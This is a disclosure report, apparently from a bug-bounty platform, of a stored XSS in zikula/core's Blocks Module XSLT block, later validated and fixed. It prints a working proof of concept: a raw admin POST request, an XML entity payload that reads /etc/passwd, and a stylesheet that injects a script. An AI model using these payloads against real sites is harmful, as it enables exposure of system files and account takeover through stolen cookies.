Cross-site Scripting (XSS) - Stored in zikula/core

Valid

Reported on

Sep 20th 2021


Description

Stored XSS in Blocks Module when Create new block with Block type ZikulaBlocksModule/Xslt

Proof of Concept

POST /blocks/admin/block/edit/8 HTTP/2
Host: demo.ziku.la
Cookie: _zsid=5idn7q9udrp7mgirikmdlep45d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1570
Origin: https://demo.ziku.la
Referer: https://demo.ziku.la/blocks/admin/block/edit/8
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

zikulablocksmodule_block%5Bbkey%5D=ZikulaBlocksModule%3AZikula%5CBlocksModule%5CBlock%5CXsltBlock&zikulablocksmodule_block%5Btitle%5D=test&zikulablocksmodule_block%5Bdescription%5D=test&zikulablocksmodule_block%5Bproperties%5D%5Bdocurl%5D=&zikulablocksmodule_block%5Bproperties%5D%5Bdoccontents%5D=%3C%21DOCTYPE+doc+%5B%0D%0A%3C%21ENTITY+boom1+SYSTEM+%22%2Fetc%2Fpasswd%22%3E%0D%0A%3C%21ENTITY+boom2+SYSTEM+%22%2Ftmp%2F%22%3E%0D%0A%5D%3E%0D%0A%3Cdoc%3E%0D%0A%3Cresponse%3E%3Cfile%3E%26boom1%3B%3C%2Ffile%3E%3C%2Fresponse%3E%0D%0A%3Cresponse%3E%3Cfile%3E%26boom2%3B%3C%2Ffile%3E%3C%2Fresponse%3E%0D%0A%3C%2Fdoc%3E&zikulablocksmodule_block%5Bproperties%5D%5Bstyleurl%5D=&zikulablocksmodule_block%5Bproperties%5D%5Bstylecontents%5D=%3Cxsl%3Astylesheet+xmlns%3Axsl%3D%22http%3A%2F%2Fwww.w3.org%2F1999%2FXSL%2FTransform%22+version%3D%221.0%22%3E%0D%0A%3Cxsl%3Atemplate+match%3D%22%2Fdoc%22%3E%0D%0A++++%3Chtml%3E%3Cbody%3E%0D%0A%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E%0D%0A++++%3Cxsl%3Afor-each+select%3D%22response%22%3E%0D%0A++++++++%3Ch2%3EFile+content+%3A%3C%2Fh2%3E%0D%0A++++++++%3Cxsl%3Avalue-of+select%3D%22file%22%2F%3E%0D%0A++++++++%3Chr%2F%3E%0D%0A++++%3C%2Fxsl%3Afor-each%3E%0D%0A++++%3C%2Fbody%3E%3C%2Fhtml%3E%0D%0A%3C%2Fxsl%3Atemplate%3E%0D%0A%3C%2Fxsl%3Astylesheet%3E&zikulablocksmodule_block%5Bpositions%5D%5B%5D=6&zikulablocksmodule_block%5Blanguage%5D=&zikulablocksmodule_block%5Bsave%5D=&zikulablocksmodule_block%5Bbid%5D=8&zikulablocksmodule_block%5Bblocktype%5D=Xslt&zikulablocksmodule_block%5B_token%5D=7GRCrxgklklp7mhzRY529lsz388a_qzUUbkFAwYgXKc

Step to reproduce

Go to Block Module

Create new block with Block type Blocks Module/Xslt

Input Document contents with

<!DOCTYPE doc [
<!ENTITY boom1 SYSTEM "/etc/passwd">
<!ENTITY boom2 SYSTEM "/tmp/">
]>
<doc>
<response><file>&boom1;</file></response>
<response><file>&boom2;</file></response>
</doc>

Input Style sheet contents with

<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:template match="/doc">
    <html><body>
<script>alert('xss')</script>
    <xsl:for-each select="response">
        <h2>File content :</h2>
        <xsl:value-of select="file"/>
        <hr/>
    </xsl:for-each>
    </body></html>
</xsl:template>
</xsl:stylesheet>

Video Poc: PoC

Impact

This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.

We have contacted a member of the zikula/core team and are waiting to hear back 2 months ago
We have contacted a member of the zikula/core team and are waiting to hear back 2 months ago
lethanhphuc modified their report
2 months ago
Axel Guckelsberger validated this vulnerability 2 months ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
Axel Guckelsberger confirmed that a fix has been merged on bc5a43 2 months ago
Axel Guckelsberger has been awarded the fix bounty